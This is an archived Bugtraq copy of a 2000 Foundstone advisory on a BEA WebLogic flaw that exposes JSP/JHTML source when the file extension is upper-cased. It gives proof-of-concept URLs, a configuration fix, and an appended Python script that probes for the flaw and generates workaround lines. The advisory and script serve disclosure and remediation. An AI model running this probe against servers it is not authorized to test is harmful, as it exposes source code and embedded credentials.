Bugtraq mailing list archives
BEA WebLogic JSP showcode vulnerability
From: stuart.mcclure () FOUNDSTONE COM (stuart.mcclure () FOUNDSTONE COM)
Date: Mon, 12 Jun 2000 01:19:45 -0400
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"

Security Advisory
BEA's WebLogic
----------------------------------------------------------------------
FS Advisory ID:      FS-061200-2-BEA
Release Date:        June 12, 2000
Product:             WebLogic
Vendor:              BEA Systems (http://www.beasys.com)
Vendor Advisory:     None available at release time.
Type:                JSP/JHTML show code vulnerability
Severity:            Low to Medium (depending on JSP/JHTML coding practices)
Author:              Saumil Shah (saumil.shah () foundstone com)
                     Stuart McClure (stuart.mcclure () foundstone com)
                     Foundstone, Inc. (http://www.foundstone.com)
Operating Systems:   Windows NT
Vulnerable versions: Up to and including WebLogic 4.5.1
Foundstone Advisory: http://www.foundstone.com
----------------------------------------------------------------------

Description

A show code vulnerability exists in BEA's WebLogic 4.5.1 for NT that allows an attacker to view the source code of Java Server Pages (JSP) or JHTML files. The impact depends on what the pages contain: source that embeds database connection strings, credentials or business logic hands those straight to the attacker, which is why the severity above is rated by coding practice.

Details

The problem lies in the way WebLogic assigns handlers to specific file types. For example, files with the extensions .jsp and .jhtml are registered as Java Server Pages or Java Servlet files in the WebLogic configuration file "weblogic.properties", which lies under the \weblogic directory. A sample out-of-the-box configuration file looks as follows:

# ---irrelevant part trimmed out---
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# WEBLOGIC JHTML PROPERTIES
# ------------------------------------------------
# Sets up automatic page compilation for JHTML. Adjust init
# args for directory locations and uncomment to use.
weblogic.httpd.register.*.jhtml=\
        weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.initArgs.*.jhtml=\
        pageCheckSeconds=1,\
        packagePrefix=examples.jhtml,\
        compileCommand=c:/java/bin/javac.exe,\
        workingDir=d:/weblogic/myserver/classfiles,\
        verbose=true
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# WEBLOGIC JSP PROPERTIES
# ------------------------------------------------
# Sets up automatic page compilation for JSP. Adjust init
# args for directory locations and uncomment to use.
weblogic.httpd.register.*.jsp=\
        weblogic.servlet.JSPServlet
weblogic.httpd.initArgs.*.jsp=\
        pageCheckSeconds=1,\
        compileCommand=c:/java/bin/javac.exe,\
        workingDir=d:/weblogic/myserver/classfiles,\
        verbose=true

We can observe that the extensions .jsp and .jhtml are assigned to the page-compilation servlets (weblogic.servlet.jhtmlc.PageCompileServlet and weblogic.servlet.JSPServlet), which compile the page and run it before anything is returned to the client. WebLogic's matching of extensions to handlers is case sensitive by default, so it treats .jsp and .JSP as two different extensions; the same holds for .jhtml and .JHTML. When a request for a .JSP file arrives, WebLogic finds no handler registered for the .JSP extension and falls back to the default handler, which serves files as type "text". Because the underlying file system is Windows NT, which does not distinguish upper case from lower case in filenames, a request for login.JSP opens the same file as login.jsp, and the page is served as plain text without being compiled or interpreted. On WebLogic running on Unix servers, whose file systems are case sensitive, no file with the upper-case name exists and the server returns a "File not Found" error instead.

Proof of concept

Normally, JSP and JHTML files are referred to in URLs using lower case extensions.
For example:

    http://site.running.weblogic/login.jsp
        -or-
    http://site.running.weblogic/index.jhtml

By changing any letter in the extension (.jsp or .jhtml) to upper case, it is possible to obtain the unparsed source code of the JSP or JHTML file:

    http://site.running.weblogic/login.JSP
        -or-
    http://site.running.weblogic/index.JHTML

Solution

Workaround

A cumbersome workaround to this problem would be to add handlers for the following file extensions in the configuration file:

For .jsp files:

    .jsp .Jsp .jSp .jsP .JSp .jSP .JsP .JSP

For .jhtml files:

    .jhtml .Jhtml .jHtml .jhTml .jhtMl .jhtmL
    .JHtml .JhTml .JhtMl .JhtmL .jHTml .jHtMl .jHtmL .jhTMl .jhTmL .jhtML
    .JHTml .JHtMl .JHtmL .JhTMl .JhTmL .JhtML .jHTMl .jHTmL .jHtML .jhTML
    .JHTMl .JHTmL .JHtML .JhTML .jHTML
    .JHTML

These extensions cover all combinations of upper and lower case characters for .jsp (2^3 = 8 spellings) and .jhtml (2^5 = 32 spellings). Any other extension registered to a servlet in the same way needs the same treatment, since the handler lookup is what is being bypassed, not anything specific to JSP or JHTML.

Fix

Check the following property in the weblogic.properties file:

    weblogic.httpd.servlet.extensionCaseSensitive

In certain versions of BEA WebLogic Server, the default setting of this property is "false". For maximum security, as documented in the BEA security lockdown documentation at:

    http://www.weblogic.com/docs51/admindocs/properties.html
    http://www.weblogic.com/docs51/admindocs/lockdown.html

set weblogic.httpd.servlet.extensionCaseSensitive to "true", or add the following line to your weblogic.properties file:

    weblogic.httpd.servlet.extensionCaseSensitive=true

After changing the property (or adding the workaround handlers) and restarting the server, re-request a page with an upper-cased extension such as login.JSP and confirm that the response no longer contains the page source.

See the following matrix to determine the appropriate course of action for your version of BEA WebLogic Server.
Version                              Status                   Action
-----------------------------------  -----------------------  ----------------------------------------------------------
BEA WebLogic 5.1 for Windows NT      Set to true by default   None
BEA WebLogic 4.5.2 for Windows NT    Set to true by default   None
BEA WebLogic 4.5.1 for Windows NT    Set to false by default  Set weblogic.httpd.servlet.extensionCaseSensitive=true
BEA WebLogic 4.0.4 for Windows NT    Set to false by default  Set weblogic.httpd.servlet.extensionCaseSensitive=true
BEA WebLogic 3.1.8                   Set to false by default  Apply the patch found at:
                                                              ftp://ftpna.beasys.com/pub/releases/318/caseSensitiveNTFix318.zip

Credits

We would like to thank Shreeraj Shah for drawing our attention to this vulnerability. In addition, we would like to thank BEA for their prompt and serious attention to the problem.

Disclaimer

The information contained in this advisory is the copyright (C) 2000 of Foundstone, Inc. and is believed to be accurate at the time of printing, but no representation or warranty is given, express or implied, as to its accuracy or completeness. Neither the author nor the publisher accepts any liability whatsoever for any direct, indirect or consequential loss or damage arising in any way from any use of, or reliance placed on, this information for any purpose. This advisory may be redistributed provided that no fee is assigned and that the advisory is not modified in any way.
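The following Python script is an added example and is not part of the Foundstone advisory or of BEA's software. It combines the proof of concept above (flip the extension to upper case and look for unparsed source in the reply) with the workaround (enumerate every case spelling of an extension and emit the matching weblogic.httpd.register lines, so the 8 .jsp and 32 .jhtml variants are generated rather than typed by hand). The host name site.running.weblogic, the constructed sample responses, and the source markers ("<%" and "<jsp:" for JSP, "<java" for JHTML) are assumptions made for illustration; the handler class names are the ones in the sample weblogic.properties above.

```python
"""Added example (not from the advisory): probe for the upper-case-extension
show-code bug and generate the per-variant handler lines for the workaround.

Assumptions (illustrative, not WebLogic rules): unparsed JSP source is
recognised by '<%' / '<jsp:' and unparsed JHTML source by '<java' tags.
"""
import itertools
import urllib.error
import urllib.request
from urllib.parse import urlsplit, urlunsplit

# Heuristic markers that appear in page source but should never survive into
# the rendered HTML the page-compile servlets emit.  (Assumption.)
SOURCE_MARKERS = {
    "jsp": ("<%", "<jsp:"),
    "jhtml": ("<java", "</java>"),
}

# Handler classes taken from the advisory's sample weblogic.properties.
HANDLERS = {
    "jsp": "weblogic.servlet.JSPServlet",
    "jhtml": "weblogic.servlet.jhtmlc.PageCompileServlet",
}


def case_variants(ext):
    """Every upper/lower-case spelling of an extension: 2**len(ext) strings."""
    pairs = [(c.lower(), c.upper()) for c in ext]
    return sorted({"".join(p) for p in itertools.product(*pairs)})


def workaround_lines(ext):
    """weblogic.httpd.register lines for every spelling except the lower-case
    one the stock configuration already registers."""
    handler = HANDLERS[ext.lower()]
    return [f"weblogic.httpd.register.*.{v}={handler}"
            for v in case_variants(ext) if v != ext.lower()]


def _split(url):
    """(parts, path_stem, extension) or None when the path has no extension."""
    parts = urlsplit(url)
    stem, dot, ext = parts.path.rpartition(".")
    if not dot or not ext or "/" in ext:
        return None
    return parts, stem, ext


def probe_url(url):
    """The advisory's PoC transform: same URL with the extension upper-cased."""
    split = _split(url)
    if split is None:
        return None
    parts, stem, ext = split
    return urlunsplit(parts._replace(path=f"{stem}.{ext.upper()}"))


def looks_like_source(body, ext):
    return any(m in body for m in SOURCE_MARKERS.get(ext.lower(), ()))


def fetch(url):
    """Live fetch returning (status, body); HTTP errors such as 404 are
    returned rather than raised so the caller can classify them."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("latin-1")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("latin-1")


def check(url, fetch=fetch):
    """Classify one page URL:
       'vulnerable' - the upper-cased URL returned what looks like page source
       'not_found'  - 404, the Unix behaviour the advisory describes
       'ok'         - served without source markers
       'skip'       - no JSP/JHTML extension to flip"""
    split = _split(url)
    if split is None or split[2].lower() not in SOURCE_MARKERS:
        return "skip"
    ext = split[2]
    status, body = fetch(probe_url(url))
    if status == 404:
        return "not_found"
    if status == 200 and looks_like_source(body, ext):
        return "vulnerable"
    return "ok"


if __name__ == "__main__":
    # Constructed responses standing in for a vulnerable NT server: the
    # .JSP request comes back as raw source, the .jsp request as rendered HTML.
    def vulnerable_nt(url):
        if url.endswith(".JSP"):
            return 200, '<%@ page import="java.sql.*" %>\n<html>...</html>'
        return 200, "<html><body>Login</body></html>"

    print(check("http://site.running.weblogic/login.jsp", fetch=vulnerable_nt))
    for line in workaround_lines("jhtml"):
        print(line)
```

Calling check() without a fetch argument performs a live request; pass a stub, as in the __main__ block, to exercise the classification offline. The marker heuristic is deliberately loose: a false positive costs a manual look at one response, whereas the real bug shows up as scriptlets and imports in the body.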